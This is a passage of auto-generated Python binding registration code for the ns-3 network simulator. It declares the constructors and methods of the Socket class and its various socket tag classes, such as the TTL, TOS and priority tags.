>::SimpleRefCount(ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::QueueItem, ns3::empty, ns3::DefaultDeleter< ns3::QueueItem > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::QueueItem, ns3::empty, ns3::DefaultDeleter<ns3::QueueItem> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls): ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount() [constructor] cls.add_constructor([]) ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > const & o) [copy constructor] cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')]) ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >::Cleanup() [member function] cls.add_method('Cleanup', 'void', [], is_static=True) return def register_Ns3Socket_methods(root_module, cls): ## socket.h (module 'network'): ns3::Socket::Socket(ns3::Socket const & arg0) [copy constructor] cls.add_constructor([param('ns3::Socket const &', 'arg0')]) ## socket.h (module 'network'): ns3::Socket::Socket() [constructor] cls.add_constructor([]) ## socket.h (module 'network'): int ns3::Socket::Bind(ns3::Address const & address) [member function] cls.add_method('Bind', 'int', [param('ns3::Address const &', 'address')], is_pure_virtual=True, is_virtual=True) ## socket.h (module 'network'): int ns3::Socket::Bind() [member function] cls.add_method('Bind', 'int', [], is_pure_virtual=True, is_virtual=True) ## socket.h (module 'network'): int ns3::Socket::Bind6() [member function] cls.add_method('Bind6', 'int', [], is_pure_virtual=True, is_virtual=True) ## socket.h (module 'network'): void ns3::Socket::BindToNetDevice(ns3::Ptr<ns3::NetDevice> netdevice) [member function] cls.add_method('BindToNetDevice', 'void', [param('ns3::Ptr< ns3::NetDevice >', 'netdevice')], is_virtual=True) ## socket.h (module 'network'): int ns3::Socket::Close() [member function] cls.add_method('Close', 'int', [], is_pure_virtual=True, is_virtual=True) ## socket.h (module 'network'): int ns3::Socket::Connect(ns3::Address const & address) [member function] cls.add_method('Connect', 'int', [param('ns3::Address const &', 'address')], is_pure_virtual=True, is_virtual=True) ## socket.h (module 'network'): static ns3::Ptr<ns3::Socket> ns3::Socket::CreateSocket(ns3::Ptr<ns3::Node> node, ns3::TypeId tid) [member function] cls.add_method('CreateSocket', 'ns3::Ptr< ns3::Socket >', [param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::TypeId', 'tid')], is_static=True) ## socket.h (module 'network'): bool ns3::Socket::GetAllowBroadcast() const [member function] cls.add_method('GetAllowBroadcast', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## socket.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Socket::GetBoundNetDevice() [member function] cls.add_method('GetBoundNetDevice', 'ns3::Ptr< ns3::NetDevice >', []) ## socket.h (module 'network'): ns3::Socket::SocketErrno ns3::Socket::GetErrno() const [member function] cls.add_method('GetErrno', 'ns3::Socket::SocketErrno', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## socket.h (module 'network'): uint8_t ns3::Socket::GetIpTos() const [member function] cls.add_method('GetIpTos', 'uint8_t', [], is_const=True) ## socket.h (module 'network'): uint8_t ns3::Socket::GetIpTtl() const [member function] cls.add_method('GetIpTtl', 'uint8_t', [], is_const=True, is_virtual=True) ## socket.h (module 'network'): uint8_t ns3::Socket::GetIpv6HopLimit() const [member function] cls.add_method('GetIpv6HopLimit', 'uint8_t', [], is_const=True, is_virtual=True) ## socket.h (module 'network'): uint8_t ns3::Socket::GetIpv6Tclass() const [member function] cls.add_method('GetIpv6Tclass', 'uint8_t', [], is_const=True) ## socket.h (module 'network'): ns3::Ptr<ns3::Node> ns3::Socket::GetNode() const [member function] cls.add_method('GetNode', 'ns3::Ptr< ns3::Node >', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## socket.h (module 'network'): int ns3::Socket::GetPeerName(ns3::Address & address) const [member function] cls.add_method('GetPeerName', 'int', [param('ns3::Address &', 'address')], is_pure_virtual=True, is_const=True, is_virtual=True) ## socket.h (module 'network'): uint8_t ns3::Socket::GetPriority() const [member function] cls.add_method('GetPriority', 'uint8_t', [], is_const=True) ## socket.h (module 'network'): uint32_t ns3::Socket::GetRxAvailable() const [member function] cls.add_method('GetRxAvailable', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## socket.h (module 'network'): int ns3::Socket::GetSockName(ns3::Address & address) const [member function] cls.add_method('GetSockName', 'int', [param('ns3::Address &', 'address')], is_pure_virtual=True, is_const=True, is_virtual=True) ## socket.h (module 'network'): ns3::Socket::SocketType ns3::Socket::GetSocketType() const [member function] cls.add_method('GetSocketType', 'ns3::Socket::SocketType', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## socket.h (module 'network'): uint32_t ns3::Socket::GetTxAvailable() const [member function] cls.add_method('GetTxAvailable', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True) ## socket.h (module 'network'): static ns3::TypeId ns3::Socket::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## socket.h (module 'network'): static uint8_t ns3::Socket::IpTos2Priority(uint8_t ipTos) [member function] cls.add_method('IpTos2Priority', 'uint8_t', [param('uint8_t', 'ipTos')], is_static=True) ## socket.h (module 'network'): void ns3::Socket::Ipv6JoinGroup(ns3::Ipv6Address address, ns3::Socket::Ipv6MulticastFilterMode filterMode, std::vector<ns3::Ipv6Address,std::allocator<ns3::Ipv6Address> > sourceAddresses) [member function] cls.add_method('Ipv6JoinGroup', 'void', [param('ns3::Ipv6Address', 'address'), param('ns3::Socket::Ipv6MulticastFilterMode', 'filterMode'), param('std::vector< ns3::Ipv6Address >', 'sourceAddresses')], is_virtual=True) ## socket.h (module 'network'): void ns3::Socket::Ipv6JoinGroup(ns3::Ipv6Address address) [member function] cls.add_method('Ipv6JoinGroup', 'void', [param('ns3::Ipv6Address', 'address')], is_virtual=True) ## socket.h (module 'network'): void ns3::Socket::Ipv6LeaveGroup() [member function] cls.add_method('Ipv6LeaveGroup', 'void', [], is_virtual=True) ## socket.h (module 'network'): bool ns3::Socket::IsIpRecvTos() const [member function] cls.add_method('IsIpRecvTos', 'bool', [], is_const=True) ## socket.h (module 'network'): bool ns3::Socket::IsIpRecvTtl() const [member function] cls.add_method('IsIpRecvTtl', 'bool', [], is_const=True) ## socket.h (module 'network'): bool ns3::Socket::IsIpv6RecvHopLimit() const [member function] cls.add_method('IsIpv6RecvHopLimit', 'bool', [], is_const=True) ## socket.h (module 'network'): bool ns3::Socket::IsIpv6RecvTclass() const [member function] cls.add_method('IsIpv6RecvTclass', 'bool', [], is_const=True) ## socket.h (module 'network'): bool ns3::Socket::IsRecvPktInfo() const [member function] cls.add_method('IsRecvPktInfo', 'bool', [], is_const=True) ## socket.h (module 'network'): int ns3::Socket::Listen() [member function] cls.add_method('Listen', 'int', [], is_pure_virtual=True, is_virtual=True) ## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::Recv(uint32_t maxSize, uint32_t flags) [member function] cls.add_method('Recv', 'ns3::Ptr< ns3::Packet >', [param('uint32_t', 'maxSize'), param('uint32_t', 'flags')], is_pure_virtual=True, is_virtual=True) ## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::Recv() [member function] cls.add_method('Recv', 'ns3::Ptr< ns3::Packet >', []) ## socket.h (module 'network'): int ns3::Socket::Recv(uint8_t * buf, uint32_t size, uint32_t flags) [member function] cls.add_method('Recv', 'int', [param('uint8_t *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags')]) ## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::RecvFrom(uint32_t maxSize, uint32_t flags, ns3::Address & fromAddress) [member function] cls.add_method('RecvFrom', 'ns3::Ptr< ns3::Packet >', [param('uint32_t', 'maxSize'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')], is_pure_virtual=True, is_virtual=True) ## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::RecvFrom(ns3::Address & fromAddress) [member function] cls.add_method('RecvFrom', 'ns3::Ptr< ns3::Packet >', [param('ns3::Address &', 'fromAddress')]) ## socket.h (module 'network'): int ns3::Socket::RecvFrom(uint8_t * buf, uint32_t size, uint32_t flags, ns3::Address & fromAddress) [member function] cls.add_method('RecvFrom', 'int', [param('uint8_t *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')]) ## socket.h (module 'network'): int ns3::Socket::Send(ns3::Ptr<ns3::Packet> p, uint32_t flags) [member function] cls.add_method('Send', 'int', [param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags')], is_pure_virtual=True, is_virtual=True) ## socket.h (module 'network'): int ns3::Socket::Send(ns3::Ptr<ns3::Packet> p) [member function] cls.add_method('Send', 'int', [param('ns3::Ptr< ns3::Packet >', 'p')]) ## socket.h (module 'network'): int ns3::Socket::Send(uint8_t const * buf, uint32_t size, uint32_t flags) [member function] cls.add_method('Send', 'int', [param('uint8_t const *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags')]) ## socket.h (module 'network'): int ns3::Socket::SendTo(ns3::Ptr<ns3::Packet> p, uint32_t flags, ns3::Address const & toAddress) [member function] cls.add_method('SendTo', 'int', [param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags'), param('ns3::Address const &', 'toAddress')], is_pure_virtual=True, is_virtual=True) ## socket.h (module 'network'): int ns3::Socket::SendTo(uint8_t const * buf, uint32_t size, uint32_t flags, ns3::Address const & address) [member function] cls.add_method('SendTo', 'int', [param('uint8_t const *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags'), param('ns3::Address const &', 'address')]) ## socket.h (module 'network'): void ns3::Socket::SetAcceptCallback(ns3::Callback<bool, ns3::Ptr<ns3::Socket>, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionRequest, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> newConnectionCreated) [member function] cls.add_method('SetAcceptCallback', 'void', [param('ns3::Callback< bool, ns3::Ptr< ns3::Socket >, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionRequest'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'newConnectionCreated')]) ## socket.h (module 'network'): bool ns3::Socket::SetAllowBroadcast(bool allowBroadcast) [member function] cls.add_method('SetAllowBroadcast', 'bool', [param('bool', 'allowBroadcast')], is_pure_virtual=True, is_virtual=True) ## socket.h (module 'network'): void ns3::Socket::SetCloseCallbacks(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> normalClose, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> errorClose) [member function] cls.add_method('SetCloseCallbacks', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'normalClose'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'errorClose')]) ## socket.h (module 'network'): void ns3::Socket::SetConnectCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionSucceeded, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionFailed) [member function] cls.add_method('SetConnectCallback', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionSucceeded'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionFailed')]) ## socket.h (module 'network'): void ns3::Socket::SetDataSentCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> dataSent) [member function] cls.add_method('SetDataSentCallback', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'dataSent')]) ## socket.h (module 'network'): void ns3::Socket::SetIpRecvTos(bool ipv4RecvTos) [member function] cls.add_method('SetIpRecvTos', 'void', [param('bool', 'ipv4RecvTos')]) ## socket.h (module 'network'): void ns3::Socket::SetIpRecvTtl(bool ipv4RecvTtl) [member function] cls.add_method('SetIpRecvTtl', 'void', [param('bool', 'ipv4RecvTtl')]) ## socket.h (module 'network'): void ns3::Socket::SetIpTos(uint8_t ipTos) [member function] cls.add_method('SetIpTos', 'void', [param('uint8_t', 'ipTos')]) ## socket.h (module 'network'): void ns3::Socket::SetIpTtl(uint8_t ipTtl) [member function] cls.add_method('SetIpTtl', 'void', [param('uint8_t', 'ipTtl')], is_virtual=True) ## socket.h (module 'network'): void ns3::Socket::SetIpv6HopLimit(uint8_t ipHopLimit) [member function] cls.add_method('SetIpv6HopLimit', 'void', [param('uint8_t', 'ipHopLimit')], is_virtual=True) ## socket.h (module 'network'): void ns3::Socket::SetIpv6RecvHopLimit(bool ipv6RecvHopLimit) [member function] cls.add_method('SetIpv6RecvHopLimit', 'void', [param('bool', 'ipv6RecvHopLimit')]) ## socket.h (module 'network'): void ns3::Socket::SetIpv6RecvTclass(bool ipv6RecvTclass) [member function] cls.add_method('SetIpv6RecvTclass', 'void', [param('bool', 'ipv6RecvTclass')]) ## socket.h (module 'network'): void ns3::Socket::SetIpv6Tclass(int ipTclass) [member function] cls.add_method('SetIpv6Tclass', 'void', [param('int', 'ipTclass')]) ## socket.h (module 'network'): void ns3::Socket::SetPriority(uint8_t priority) [member function] cls.add_method('SetPriority', 'void', [param('uint8_t', 'priority')]) ## socket.h (module 'network'): void ns3::Socket::SetRecvCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> arg0) [member function] cls.add_method('SetRecvCallback', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'arg0')]) ## socket.h (module 'network'): void ns3::Socket::SetRecvPktInfo(bool flag) [member function] cls.add_method('SetRecvPktInfo', 'void', [param('bool', 'flag')]) ## socket.h (module 'network'): void ns3::Socket::SetSendCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> sendCb) [member function] cls.add_method('SetSendCallback', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'sendCb')]) ## socket.h (module 'network'): int ns3::Socket::ShutdownRecv() [member function] cls.add_method('ShutdownRecv', 'int', [], is_pure_virtual=True, is_virtual=True) ## socket.h (module 'network'): int ns3::Socket::ShutdownSend() [member function] cls.add_method('ShutdownSend', 'int', [], is_pure_virtual=True, is_virtual=True) ## socket.h (module 'network'): void ns3::Socket::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True) ## socket.h (module 'network'): bool ns3::Socket::IsManualIpTtl() const [member function] cls.add_method('IsManualIpTtl', 'bool', [], is_const=True, visibility='protected') ## socket.h (module 'network'): bool ns3::Socket::IsManualIpv6HopLimit() const [member function] cls.add_method('IsManualIpv6HopLimit', 'bool', [], is_const=True, visibility='protected') ## socket.h (module 'network'): bool ns3::Socket::IsManualIpv6Tclass() const [member function] cls.add_method('IsManualIpv6Tclass', 'bool', [], is_const=True, visibility='protected') ## socket.h (module 'network'): void ns3::Socket::NotifyConnectionFailed() [member function] cls.add_method('NotifyConnectionFailed', 'void', [], visibility='protected') ## socket.h (module 'network'): bool ns3::Socket::NotifyConnectionRequest(ns3::Address const & from) [member function] cls.add_method('NotifyConnectionRequest', 'bool', [param('ns3::Address const &', 'from')], visibility='protected') ## socket.h (module 'network'): void ns3::Socket::NotifyConnectionSucceeded() [member function] cls.add_method('NotifyConnectionSucceeded', 'void', [], visibility='protected') ## socket.h (module 'network'): void ns3::Socket::NotifyDataRecv() [member function] cls.add_method('NotifyDataRecv', 'void', [], visibility='protected') ## socket.h (module 'network'): void ns3::Socket::NotifyDataSent(uint32_t size) [member function] cls.add_method('NotifyDataSent', 'void', [param('uint32_t', 'size')], visibility='protected') ## socket.h (module 'network'): void ns3::Socket::NotifyErrorClose() [member function] cls.add_method('NotifyErrorClose', 'void', [], visibility='protected') ## socket.h (module 'network'): void ns3::Socket::NotifyNewConnectionCreated(ns3::Ptr<ns3::Socket> socket, ns3::Address const & from) [member function] cls.add_method('NotifyNewConnectionCreated', 'void', [param('ns3::Ptr< ns3::Socket >', 'socket'), param('ns3::Address const &', 'from')], visibility='protected') ## socket.h (module 'network'): void ns3::Socket::NotifyNormalClose() [member function] cls.add_method('NotifyNormalClose', 'void', [], visibility='protected') ## socket.h (module 'network'): void ns3::Socket::NotifySend(uint32_t spaceAvailable) [member function] cls.add_method('NotifySend', 'void', [param('uint32_t', 'spaceAvailable')], visibility='protected') return def register_Ns3SocketIpTosTag_methods(root_module, cls): ## socket.h (module 'network'): ns3::SocketIpTosTag::SocketIpTosTag(ns3::SocketIpTosTag const & arg0) [copy constructor] cls.add_constructor([param('ns3::SocketIpTosTag const &', 'arg0')]) ## socket.h (module 'network'): ns3::SocketIpTosTag::SocketIpTosTag() [constructor] cls.add_constructor([]) ## socket.h (module 'network'): void ns3::SocketIpTosTag::Deserialize(ns3::TagBuffer i) [member function] cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_virtual=True) ## socket.h (module 'network'): ns3::TypeId ns3::SocketIpTosTag::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True) ## socket.h (module 'network'): uint32_t ns3::SocketIpTosTag::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True) ## socket.h (module 'network'): uint8_t ns3::SocketIpTosTag::GetTos() const [member function] cls.add_method('GetTos', 'uint8_t', [], is_const=True) ## socket.h (module 'network'): static ns3::TypeId ns3::SocketIpTosTag::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## socket.h (module 'network'): void ns3::SocketIpTosTag::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True) ## socket.h (module 'network'): void ns3::SocketIpTosTag::Serialize(ns3::TagBuffer i) const [member function] cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_const=True, is_virtual=True) ## socket.h (module 'network'): void ns3::SocketIpTosTag::SetTos(uint8_t tos) [member function] cls.add_method('SetTos', 'void', [param('uint8_t', 'tos')]) return def register_Ns3SocketIpTtlTag_methods(root_module, cls): ## socket.h (module 'network'): ns3::SocketIpTtlTag::SocketIpTtlTag(ns3::SocketIpTtlTag const & arg0) [copy constructor] cls.add_constructor([param('ns3::SocketIpTtlTag const &', 'arg0')]) ## socket.h (module 'network'): ns3::SocketIpTtlTag::SocketIpTtlTag() [constructor] cls.add_constructor([]) ## socket.h (module 'network'): void ns3::SocketIpTtlTag::Deserialize(ns3::TagBuffer i) [member function] cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_virtual=True) ## socket.h (module 'network'): ns3::TypeId ns3::SocketIpTtlTag::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True) ## socket.h (module 'network'): uint32_t ns3::SocketIpTtlTag::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True) ## socket.h (module 'network'): uint8_t ns3::SocketIpTtlTag::GetTtl() const [member function] cls.add_method('GetTtl', 'uint8_t', [], is_const=True) ## socket.h (module 'network'): static ns3::TypeId ns3::SocketIpTtlTag::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## socket.h (module 'network'): void ns3::SocketIpTtlTag::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True) ## socket.h (module 'network'): void ns3::SocketIpTtlTag::Serialize(ns3::TagBuffer i) const [member function] cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_const=True, is_virtual=True) ## socket.h (module 'network'): void ns3::SocketIpTtlTag::SetTtl(uint8_t ttl) [member function] cls.add_method('SetTtl', 'void', [param('uint8_t', 'ttl')]) return def register_Ns3SocketIpv6HopLimitTag_methods(root_module, cls): ## socket.h (module 'network'): ns3::SocketIpv6HopLimitTag::SocketIpv6HopLimitTag(ns3::SocketIpv6HopLimitTag const & arg0) [copy constructor] cls.add_constructor([param('ns3::SocketIpv6HopLimitTag const &', 'arg0')]) ## socket.h (module 'network'): ns3::SocketIpv6HopLimitTag::SocketIpv6HopLimitTag() [constructor] cls.add_constructor([]) ## socket.h (module 'network'): void ns3::SocketIpv6HopLimitTag::Deserialize(ns3::TagBuffer i) [member function] cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_virtual=True) ## socket.h (module 'network'): uint8_t ns3::SocketIpv6HopLimitTag::GetHopLimit() const [member function] cls.add_method('GetHopLimit', 'uint8_t', [], is_const=True) ## socket.h (module 'network'): ns3::TypeId ns3::SocketIpv6HopLimitTag::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True) ## socket.h (module 'network'): uint32_t ns3::SocketIpv6HopLimitTag::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True) ## socket.h (module 'network'): static ns3::TypeId ns3::SocketIpv6HopLimitTag::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## socket.h (module 'network'): void ns3::SocketIpv6HopLimitTag::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True) ## socket.h (module 'network'): void ns3::SocketIpv6HopLimitTag::Serialize(ns3::TagBuffer i) const [member function] cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_const=True, is_virtual=True) ## socket.h (module 'network'): void ns3::SocketIpv6HopLimitTag::SetHopLimit(uint8_t hopLimit) [member function] cls.add_method('SetHopLimit', 'void', [param('uint8_t', 'hopLimit')]) return def register_Ns3SocketIpv6TclassTag_methods(root_module, cls): ## socket.h (module 'network'): ns3::SocketIpv6TclassTag::SocketIpv6TclassTag(ns3::SocketIpv6TclassTag const & arg0) [copy constructor] cls.add_constructor([param('ns3::SocketIpv6TclassTag const &', 'arg0')]) ## socket.h (module 'network'): ns3::SocketIpv6TclassTag::SocketIpv6TclassTag() [constructor] cls.add_constructor([]) ## socket.h (module 'network'): void ns3::SocketIpv6TclassTag::Deserialize(ns3::TagBuffer i) [member function] cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_virtual=True) ## socket.h (module 'network'): ns3::TypeId ns3::SocketIpv6TclassTag::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True) ## socket.h (module 'network'): uint32_t ns3::SocketIpv6TclassTag::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True) ## socket.h (module 'network'): uint8_t ns3::SocketIpv6TclassTag::GetTclass() const [member function] cls.add_method('GetTclass', 'uint8_t', [], is_const=True) ## socket.h (module 'network'): static ns3::TypeId ns3::SocketIpv6TclassTag::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## socket.h (module 'network'): void ns3::SocketIpv6TclassTag::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True) ## socket.h (module 'network'): void ns3::SocketIpv6TclassTag::Serialize(ns3::TagBuffer i) const [member function] cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_const=True, is_virtual=True) ## socket.h (module 'network'): void ns3::SocketIpv6TclassTag::SetTclass(uint8_t tclass) [member function] cls.add_method('SetTclass', 'void', [param('uint8_t', 'tclass')]) return def register_Ns3SocketPriorityTag_methods(root_module, cls): ## socket.h (module 'network'): ns3::SocketPriorityTag::SocketPriorityTag(ns3::SocketPriorityTag const & arg0) [copy constructor] cls.add_constructor([param('ns3::SocketPriorityTag const &', 'arg0')]) ## socket.h (module 'network'): ns3::SocketPriorityTag::SocketPriorityTag() [constructor] cls.add_constructor([]) ## socket.h (module 'network'): void ns3::SocketPriorityTag::Deserialize(ns3::TagBuffer i) [member function] cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_virtual=True) ## socket.h (module 'network'): ns3::TypeId ns3::SocketPriorityTag::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True) ## socket.h (module 'network'): uint8_t ns3::SocketPriorityTag::GetPriority() const [member function] cls.add_method('GetPriority', 'uint8_t', [], is_const=True) ## socket.h (module 'network'): uint32_t ns3::SocketPriorityTag::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True) ## socket.h (module 'network'): static ns3::TypeId ns3::SocketPriorityTag::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## socket.h (module 'network'): void ns3::SocketPriorityTag::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True) ## socket.h (module 'network'): void ns3::SocketPriorityTag::Serialize(ns3::TagBuffer i) const [member function] cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_const=True, is_virtual=True) ## socket.h (module 'network'): void ns3::SocketPriorityTag::SetPriority(uint8_t priority) [member function] cls.add_method('SetPriority', 'void', [param('uint8_t', 'priority')]) return def register_Ns3SocketSetDontFragmentTag_methods(root_module, cls): ## socket.h (module 'network'): ns3::SocketSetDontFragmentTag::SocketSetDontFragmentTag(ns3::SocketSetDontFragmentTag const & arg0) [copy constructor] cls.add_constructor([param('ns3::SocketSetDontFragmentTag const &', 'arg0')]) ## socket.h (module 'network'): ns3::SocketSetDontFragmentTag::SocketSetDontFragmentTag() [constructor] cls.add_constructor([]) ## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Deserialize(ns3::TagBuffer i) [member function] cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_virtual=True) ## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Disable() [member function] cls.add_method('Disable', 'void', []) ## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Enable() [member function] cls.add_method('Enable', 'void', []) ## socket.h (module 'network'): ns3::TypeId ns3::SocketSetDontFragmentTag::GetInstanceTypeId() const [member function] cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True) ## socket.h (module 'network'): uint32_t ns3::SocketSetDontFragmentTag::GetSerializedSize() const [member function] cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True) ## socket.h (module 'network'): static ns3::TypeId ns3::SocketSetDontFragmentTag::GetTypeId() [member function] cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True) ## socket.h (module 'network'): bool ns3::SocketSetDontFragmentTag::IsEnabled() const [member function] cls.add_method('IsEnabled', 'bool', [], is_const=True) ## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Print(std::ostream & os) const [member function] cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True) ## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Serialize(ns3::TagBuffer i) const [member function] cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], 